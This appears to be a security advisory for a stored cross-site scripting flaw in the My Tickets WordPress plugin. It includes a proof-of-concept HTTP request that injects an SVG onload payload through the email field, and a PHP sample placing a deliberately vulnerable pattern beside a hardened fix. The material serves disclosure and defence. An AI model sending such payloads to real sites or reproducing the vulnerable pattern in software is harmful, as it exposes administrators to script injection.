My Tickets < 1.8.31 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not properly sanitise and escape the Email field of booked tickets before outputting it in the Payments admin dashboard, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins.
Proof of Concept
As an unauthenticated user, book a ticket, fill the purchase form with dummy data and intercept the request to change the email address (which is validated client side but not server side) to something like <svg/onload=alert(/XSS/)>
POST /purchase/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 413
Origin: http://wp.lab
Connection: close
Cookie: mt_unique_id=-KFPBzwr-0Y2BZ1a
Upgrade-Insecure-Requests: 1

_wpnonce=97e4184df7&mt_gateway=offline&mt_cart_order%5B1950%5D%5Badult%5D%5Bcount%5D=1&mt_cart_order%5B1950%5D%5Badult%5D%5Bprice%5D=1.00&mt_cart_order%5B1950%5D%5Badult%5D%5Borig_price%5D=1&mt_fname=XSS&mt_lname=swd&mt_email=<svg/onload=alert(/XSS/)>&mt_email2=<svg/onload=alert(/XSS/)>&ticketing_method=printable&mt_submit=Review+cart+and+make+payment&my-tickets=true
Then confirm the reservation. The XSS will be triggered when an admin views the Payments page in the admin dashboard (/wp-admin/edit.php?post_type=mt-payments)
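The root cause is a missing server-side check on input plus missing escaping on output. The following is an added illustration and not the My Tickets plugin's own code: the function names, the option key and the use of the mt_email field are assumptions modelled on the request above. It shows the unsafe pattern beside a hardened version using WordPress core's sanitize_email(), is_email() and esc_html().

```php
<?php
// Added example, not code from the My Tickets plugin. Function names and the
// option key 'mt_example_last_email' are hypothetical; mt_email is the field
// name seen in the PoC request.

// Vulnerable pattern: the submitted value is stored as-is and echoed raw.
function mt_example_vulnerable_save() {
    $email = $_POST['mt_email'];                 // no server-side validation
    update_option( 'mt_example_last_email', $email );
}

function mt_example_vulnerable_render() {
    $email = get_option( 'mt_example_last_email' );
    echo '<td>' . $email . '</td>';              // unescaped output in wp-admin
}

// Hardened pattern: validate on input, escape on output.
function mt_example_hardened_save() {
    $raw   = isset( $_POST['mt_email'] ) ? wp_unslash( $_POST['mt_email'] ) : '';
    $email = sanitize_email( $raw );             // strips characters not valid in an address
    // is_email() rejects anything that is not a syntactically valid address,
    // so markup submitted in the field never reaches the database. The
    // client-side check alone is not enough because the request can be
    // modified before it is sent, as the PoC above shows.
    if ( ! is_email( $email ) ) {
        wp_die( 'Please enter a valid email address.' );
    }
    update_option( 'mt_example_last_email', $email );
}

function mt_example_hardened_render() {
    $email = get_option( 'mt_example_last_email', '' );
    // Escape at the point of output regardless of what was stored: rows
    // written before the validation was added must still render safely.
    echo '<td>' . esc_html( $email ) . '</td>';
}
```

Both halves of the fix matter: validation stops new malicious values from being stored, and output escaping neutralises any that are already in the database.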
References
https://wpscan.com/vulnerability/d973dc0f-3cb4-408d-a8b0-01abeb9ef951